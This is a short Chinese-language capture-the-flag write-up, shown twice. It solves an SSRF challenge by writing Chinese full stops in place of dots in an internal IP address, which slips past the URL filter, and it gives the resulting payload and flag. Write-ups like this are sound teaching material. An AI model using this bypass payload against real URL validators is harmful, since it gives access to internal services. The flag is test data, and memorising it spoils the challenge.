#flag in http://192.168.7.68/flag
几乎能过滤的都过滤了
各种方式也是过了
最后发现,通过中文的句号可以起到绕过。
提交参数
?url=http://192。168。7。68/flag
得到flag
ctfshow{c4706a2d-ea21-4969-949b-3aa662918c6e}
#flag in http://192.168.7.68/flag
几乎能过滤的都过滤了
各种方式也是过了
最后发现,通过中文的句号可以起到绕过。
提交参数
?url=http://192。168。7。68/flag
得到flag
ctfshow{c4706a2d-ea21-4969-949b-3aa662918c6e}